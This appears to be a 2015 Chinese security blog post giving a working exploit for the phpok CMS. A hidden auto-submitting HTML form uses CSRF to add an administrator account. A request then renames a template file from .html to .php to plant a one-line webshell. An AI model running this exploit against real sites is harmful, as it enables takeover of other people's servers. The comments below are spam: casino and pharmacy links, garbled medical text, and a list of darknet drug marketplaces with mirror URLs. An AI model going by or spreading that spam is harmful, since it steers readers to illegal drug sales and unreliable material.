phpok csrf添加管理员+后台getshell

时间:2015-2-8    作者:admin    分类: 技术交流


老问题,一直没修复。

poc:

code 区域
<div style="display:none">

<form action="http://localhost/phpok/admin.php?c=admin&f=save" id="poc" name="poc" method="post">

<input type="hidden" name="id" value=""/>

<input type="hidden" name="account" value=""/>

<input type="hidden" name="pass" value=""/>

<input type="hidden" name="email" value=""/>

<input type="hidden" name="status" value=""/>

<input type="hidden" name="if_system" value=""/>

<input type="submit" name="up" value="submit"/>

</form>

<script>

var t = document.poc;

t.account.value="wooyun";

t.pass.value="123456";

t.status.value="1";

t.if_system.value="1";

document.poc.submit();

</script>

</div>


QQ截图20150114173941.png





访问poc后

QQ截图20150114174011.png





Getshell:

风格管理-创建模板文件

默认这里只能添加html文件。但是可以绕过

QQ截图20150114174536.png



code 区域
GET /phpok/admin.php?c=tpl&f=create&id=1&folder=/&type=file&title=wooyun.html



修改成

code 区域
GET /phpok/admin.php?c=tpl&f=create&id=1&folder=/&type=file&title=wooyun.php


QQ截图20150114174709.png



然后在编辑文件写入一句话木马就OK了。

标签: CSRF phpok getshell

评论:

Claudiaaluby 1 天前
pokie game
slot machines <a href=https://aussieoddster.com/>online casino real money</a> casino gaming
online casino australia
DanteNak 1 天前
https://www.live4cup.com/f-sp1842310-.html#p1842310
RobertUttes 1 天前
Важно знать где купить хорошие солнцезащитные очки https://opticstyle.spb.ru/internet-magazin/product/dolce-gabbana-dg-4405-501/8g  Очки купленные на рынке за тысячу рублей вряд ли смогут защитить глаза от ультрафиолета https://opticstyle.spb.ru/internet-magazin/product/fun-kids-fh-08-br  Безопаснее приобретать солнцезащитные модели в проверенных салонах оптики где есть возможность лично проверить наличие УФ-блока и степень защиты с помощью специального индикатора https://opticstyle.spb.ru/internet-magazin/vendor/polaroid/p/2 Заказать очки по рецепту недорого в СПб в нашей компании просто https://opticstyle.spb.ru/akcii  Вы можете посмотреть коллекции известных Европейских производителей очков у нас на сайте или просто позвонить нам и мы подскажем наличие интересующей Вас модели оправ или солнцезащитных очков https://opticstyle.spb.ru/internet-magazin/product/mexx-mod-5946-105 Ремонт очков любой сложности Во многих странах сертификация солнцезащитных очков является добровольной поэтому на этикетках не всегда указываются номера стандартов https://opticstyle.spb.ru/internet-magazin/product/escada-vese02-col.0722  Иногда производители используют другую маркировку — категории защиты https://opticstyle.spb.ru/internet-magazin/product/nano-nao50136hsc  Они могут немного отличаться в зависимости от региона но общий принцип один: чем выше категория тем сильнее фильтрация https://opticstyle.spb.ru/internet-magazin/product/jimmy-choo-jc175-h8t  Например в Европе существуют категории 0 2 6 и 7 а в США их всего три https://opticstyle.spb.ru/internet-magazin/product/ray-ban-rb-4340-6430/b1  При этом американский максимальный уровень подразумевает 99-ю защиту от УФ-лучей а европейская «семерка» допускает диапазон 95–99 . Ультрафиолетовое излучение обладает накопительным эффектом воздействия на глаза на протяжении всей жизни https://opticstyle.spb.ru/internet-magazin/product/nano-nao3021046  Примерно к 18 годам жители умеренного климата получают максимально допустимую безопасную дозу после чего избыточное излучение может начать оказывать разрушительное влияние https://opticstyle.spb.ru/internet-magazin/product/polaroid-p0425-kea-y2  Оно способно повреждать хрусталик ускоряя развитие катаракты а также негативно сказываться на макулярной зоне — участке сетчатки отвечающем за четкость зрения https://opticstyle.spb.ru/internet-magazin/product/dolce-gabbana-dg5056-3275
MarionFum 1 天前
DavidsaK 2 天前
16 лет в SEO – это не только знания но и проверенные инструменты. Я использую Xrumer и GSA SER но самое главное – правильные базы. У меня есть доступ к сервису баз с недорогой подпиской на год. https://dseo24.monster
LeonelMom 2 天前
Несмотря на то что наш производственный цех может отшивать большие объемы одежды мы понимаем что многие компании предпочитают заказывать маленьким оптом https://norsy.ru/otzyvy  Мы всегда готовы выслушать потребности каждого клиента и предложить оптимальные условия сотрудничества для всех https://norsy.ru/kontakty 4 Отлаженная логистика https://norsy.ru/kontakty Пошив одежды оптом ПО ИНДИВИДУАЛЬНОМУ ДИЗАЙНУ https://norsy.ru/poshiv-hudi На нашей швейной фабрике вы сможете заказать пошив верхней одежды для женщин производство курток для мужчин пошив комбинезонов для детей пошив спецодежды для сотрудников предприятия https://norsy.ru/poshiv-futbolok  Швейные цеха готовы принять заказ на изготовление и пошив одежды и других швейных изделий - сдавать ежедневно по несколько десятков единиц продукции Наше швейное производство предлагает пошив верхней одежды мелким и крупным оптом на заказ https://norsy.ru/otzyvy Индивидуальный подход и качество выполнения https://norsy.ru/o-nas ПОШИВ ОДЕЖДЫ https://norsy.ru/ceny
Tomphano 2 天前
The probability of the occurrence of subsequent treatment occasions was estimated using a Poisson mannequin, the place the speed of occurrence was assumed to be a function of affected person age and examine followup time, on a logarithmic scale. Cultures of blood leucocytes: From lymphocytes and monocytes to connective tissue. At final the doctor advised an operation which necessitated her removing to the hospital virus cell <a href=https://cmaan.pa.gov.br/pills-sale/buy-zithromax-no-rx/>zithromax 100 mg order on line</a>.
Studies ranged from Level AпїЅrandomized control (2), Level BпїЅnonrandomized control design (5), and Level CпїЅsingle-group designs by which pre and post variations were examined (7). All this presupposes the optimal bal- studying-formation, oriented to the acquisition of the key ancing of several elements knowing, with the ability to do competences of the specialist in Internal Medicine and for the and having the ability to be in a perspective of interplay activation of a virtual cycle of enchancment of scientific between doctor and patient, and practical options for follow. Immunocompromised sufferers with Epstein-Barr virus have elevated incidence of leiomyosarcoma seen in at least 2 populations: a antimicrobial hypothesis <a href=https://cmaan.pa.gov.br/pills-sale/buy-omnicef-online-in-usa/>purchase 300 mg omnicef free shipping</a>. There are these opinions are primarily based on current ideas relating to 6 commercially obtainable skin test preparations for stinging constitutive allergenicity, cross-allergenicity, aerobiologic and biting bugs (eg, honey bee, wasp, yellow jacket, yellow monitoring, and correlation with organ challenge testing or confronted hornet, white confronted hornet, and imported fireplace ant). Models for leukemia differ from these for solid cancers the quantities S(a) were obtained from a 1999 unabridged in that threat is expressed as a operate of age at publicity (e) life desk for the U. If imaging research using other radioactive tracers have been recently performed, adequate time must elapse to permit for clearance of activity from the guts and surrounding regions medicine urology <a href=https://cmaan.pa.gov.br/pills-sale/buy-cheap-brahmi-no-rx/>quality brahmi 60 caps</a>. Although the temporal lobe (particularly the hippocampus or amygdala) is the most common web site of origin, some seizures have been proven to originate from mesial parasagittal or orbital frontal regions. The inforartery, spine and neck muscle tissue, auscultation of the neck and mation from these diaries could assist each the affected person and orbit for bruit, and assessing the temporomandibular joint could provider determine trends or triggers, which in flip might help provide useful clues, as with analysis of gait and looking for forestall or deal with the headaches. Under native or basic anaesthesia, the inferior meatus is uncovered after which a harpoon or MyleпїЅs gouge is handed by way of the nasoantral wall, under the inferior turbinate medicine checker <a href=https://cmaan.pa.gov.br/pills-sale/buy-prothiaden/>cheap prothiaden online master card</a>. Columns one and two show the adjusted determinants of unmet want for household planning, and column three shows the variations in unmet need for household planning derived from the pooled logistic regression. The residue Summary: Plant phosphatides embrace lecithin, which consists of very pure lecithin. High heterogeneity was observed (I2 = seventy eight%), which seemed to be primarily due to the dimension of the effect women's health clinic uk <a href=https://cmaan.pa.gov.br/pills-sale/buy-kyliformon/>buy discount kyliformon online</a>.
FraserHob 2 天前
Priority Partners is not answerable for payment of any remaining days of a hospital admission that began prior to a Medicaid participant’s enrollment in Priority Partners. The examiner helps the limb with one hand and pushes laterally against the medial border of the first metatarsal. When blood glucose goals are not met with diet and exercise alone, therapy with an oral agent is indicated medicine 44175 <a href=https://cmaan.pa.gov.br/pills-sale/buy-isoniazid-online/>purchase on line isoniazid</a>.
Poisoning, poisonous results, opposed effects and underdosing in a pregnant affected person A code from subcategory O9A. If regression is understood as a return, or recourse, to earlier and fewer structured types of handling issues and the psychoanalytic therapeutic work is conceived as moving backwards, then the idea of progression forms a counterbalance indicating the more extremely structured and grownup mode of operation. When clients are pressured into counselling, it is necessary that the inter viewer present respect and understanding for the client’s aversion to talking in regards to the matter heart attack 720p download <a href=https://cmaan.pa.gov.br/pills-sale/buy-cheap-benicar-no-rx/>purchase on line benicar</a>. The effects of nitrous oxide on rising neural tips (progress cones) within the forebrains of neonatal rat pups were described in a 1993 report (27). The examples identify essential opportunities for enhancing the quality of maternity care for giant proportions of mothers and infants through provision of effective care with minimal harm. It consists of all data used for scientific staging plus findings at surgical procedure and pathological findings from surgical resection gastritis or ulcer <a href=https://cmaan.pa.gov.br/pills-sale/buy-pantoprazole-online-in-usa/>buy 40 mg pantoprazole with mastercard</a>. Despite the incredible power of smells to drop us down rabbit holes of memory and transport us to different places and occasions, the equipment that detects and is sensible of this info remains poorly understood. As acknowledged in the European Best Practice Guidelines for the Management of Anaemia,273 it is important to define anemia relative to physiological norms rather than payment rules. Given the relative non-specificity of signs Some authorities have advocated that free testosterone associated with low testosterone, a need exists to must be the first measure used to define define a total testosterone threshold to information clinicians testosterone deficiency gastritis eating plan <a href=https://cmaan.pa.gov.br/pills-sale/buy-motilium/>motilium 10 mg purchase</a>. Based on this fact, we 334 Reproductive Health can see the significant effect of poliomyelitis is it�s morbidity rather than its mortality. Moreover, though HygA was still detected, the level of antibiotic production was forty four Agata L. As torn hangnails might become contaminated, they need to be removed with sharp-pointed scissors and the affected pores and skin space should be treated with mupirocine mood disorder blood tests <a href=https://cmaan.pa.gov.br/pills-sale/buy-escitalopram-online/>order escitalopram 20 mg with amex</a>.
Albertvoime 3 天前
<a href=https://artemovoizhs.ru>поселок хлебороб поспелихинский район школа артемова татьяна
</a>
AleksandrSkext 3 天前
екапуста займ на карту

взять микрозайм
MichealHep 3 天前
доброй ночи  нашла порошковая покраска металла заказать site нам нужно понять cc меттталоизделия из нержавейки для себя Просим c советом и как нам .. правильно как понимать или быть в теме..  резка титана стоимость прошу c по задчи буду сильнно благодарствуем ... Спасибо =_ .. искал в t.me  покраска металла порошковой краской подольск Порошковая ПокраскаSteelCenturyRU
rc24probaf 3 天前
<b>Рейтинг проверенных площадок 2026</b>

Редакция  dark-net.life публикует актуальный рейтинг надёжных площадок на февраль 2026. Все сайты из списка прошли отбор — фейки и скамы исключены. Добавьте в закладки — адреса обновляются.

Ниже представлен список площадок с рабочими ссылками. Для входа используйте рядом с каждой площадкой.

<hr>

<b>1. LoveShop</b> ★★★★☆
Работает стабильно на протяжении нескольких лет — 250+ городов. Сверяйте ссылки на Rutor.
Рекомендуем — loveshop, лавшоп, loveshop biz, loveshop tor, loveshop зеркало, loveshop1, loveshop2, loveshop12, loveshop13, loveshop1300, loveshop18, ссылка лавшоп
<b>Зеркало:</b> <a href=https://loveshop.dev>loveshop13.shop</a>

<b>2. Orb11ta</b> ★★★★☆
Более 10 лет работы — 250+ городов. Один из лидеров.
Надёжная площадка — orb11ta, orb11ta com, orb11ta vip, orb11ta сайт, orb11ta top, orb11ta org, orb11ta ton, орбита бот, https orb11ta site, orb11ta com сайт вход
<b>Зеркало:</b> <a href=https://orbllta.com>orbllta.com</a>

<b>3. Chemical 696</b> ★★★★☆
Проверенная химия — чемикал 696 биз. Проверен на форумах.
Надёжная площадка — chem696, chemical696, chemi696, chemi to, chemshop2 com, chm696 biz, chm1 biz, chemical 696 biz официальный, чемикал 696, чемикал биз, chmcl696
<b>Зеркало:</b> <a href=https://chemshop2.live>chem696.com</a>

<b>4. LineShop</b> ★★★★☆
Работает стабильно — лайншоп. Проверено редакцией.
Надёжная площадка — lineshop biz, lineshop 24, lineshop biz 24, lineshop blz, лайншоп, ls24 biz, ls24 biz официальный, ls24 biz официальный сайт, ls24 махачкала, ls24 blz, ls25 biz, ls24 bis
<b>Зеркало:</b> <a href=https://lineshop.sale>lineshop.lol</a>

<b>5. TripMaster</b> ★★★★★
Проверенная площадка — tripmaster официальный. Быстрая поддержка.
Рекомендуем — tripmaster to, tripmaster biz, tripmaster официальный, tripmaster 24, tripmaster ton, tripmaster biz проверка заказа, tripmaster24, tripmaster24 biz, mastertrip24 biz, tripmaster24 diz
<b>Зеркало:</b> <a href=https://mastertrip24.com>tripmaster.info</a>

<b>6. Syndi24</b> ★★★★★
Надёжный сайт — синдикат официальный сайт. Проверено.
Проверенный магазин — syndi24, syndi24 biz, syndi24 bz, синдикат 24, синдикат бот, синдикат шоп, синдикат сайт, синдикат официальный сайт, syndicate 24 biz, syndicate biz, syndicate one, syndicate 24 4 biz зеркала
<b>Зеркало:</b> <a href=https://syndi24.shop>syndi24.shop</a>

<b>7. Narco24</b> ★★★★☆
Проверенный магазин — narkolog 24 biz. Надёжная поддержка.
Топ выбор — narkolog, narkolog ru, narkolog biz, narkolog 24 biz, narkolog me, narco24, narco24 biz, narco24 biz официальный, narco24 официальный сайт, narcolog24, narcolog24 biz, narco 24, narco 24 biz
<b>Зеркало:</b> <a href=https://narcolog.vision>narcolog.rip</a>

<b>8. Tot</b> ★★★★★
Стабильный магазин — tot777 ton. Актуальные зеркала.
Надёжная площадка — black tot, bbt007, bbt007 com, bbt777 biz, bbt777 to, ббт777, tot777, tot777 ton
<b>Зеркало:</b> <a href=https://tot777.pro>bbt007.top</a>

<b>9. BobOrganic</b> ★★★★☆
В гостях у боба — проверенный магазин — boborganic biz. Рекомендован пользователями.
Рекомендуем — boborganic to, boborganic biz, boborganic ton, боб органик, в гостях у боба, в гостях у боба тг, в гостях у боба сайт, в гостях у боба магазин, в гостях у боба омск, в гостях у боба новосибирск, tonsite boborganic ton
<b>Зеркало:</b> <a href=https://boborganic.click>bob.organic</a>

<b>10. BadBoy</b> ★★★★☆
Стабильный магазин — badboy96 biz. Проверено.
Надёжная площадка — badboy96, badboy96 biz, badboy ton, badboy, badboysk, badboy999
<b>Зеркало:</b> <a href=https://badboy96.click>badboy96.shop</a>

<b>11. Kot24</b> ★★★★☆
Кот24 — проверенный магазин — мяу маркет. Актуальные зеркала.
Топ выбор — kot24, кот24, мяу маркет, kot24 biz, kot24 com, kot24 cc, kot 24
<b>Зеркало:</b> <a href=https://kot24.click>kot24.pro</a>

<b>12. Megapolis2</b> ★★★★☆
Стабильный магазин — megapolis2 com. Актуальные зеркала.
Проверенный магазин — megapolis2, megapolis2 com, megapolis com, megapolis 2 com
<b>Зеркало:</b> <a href=https://megapolis2.sale>megapolis2.pro</a>

<b>13. Stavklad</b> ★★★★☆
Проверенный склад — stavklad biz. Актуальные зеркала.
Стабильная работа — stavklad, stavklad com, www stavklad com, stavklad biz, sevkavklad biz, sevkavklad to, sevkavklad com, магазин прош
<b>Зеркало:</b> <a href=https://stavklad.click>stavklad.shop</a>

<b>14. Sberklad</b> ★★★★★
Проверенная площадка — лирика краснодар. Доставка в Краснодар, Махачкалу, Ростов-на-Дону.
Рекомендуем — sberklad biz, sbereapteka, sbereapteka biz, sber eapteka, лирика краснодар, лирика пятигорск, лирика нальчик телеграм, купить лирику краснодар, лирика без рецепта краснодар, купить лирику в краснодаре без рецепта, лирика таблетки 300 где купить в краснодаре, лирика махачкала, ростов на дону лирика, купить лирику ростов на дону
<b>Зеркало:</b> <a href=https://sberklad.click>sberklad.click</a>

<hr>
<i>Материал подготовлен  dark-net.life — актуально на апрель 2026. Добавьте в закладки — адреса меняются.</i>
OlivereLevy 4 天前
<a href=https://brusnikinozem.ru>поселок брусникино
кп брусникино домодедово
купить дом брусникино
брусникино домодедово
кафе брусникино
</a>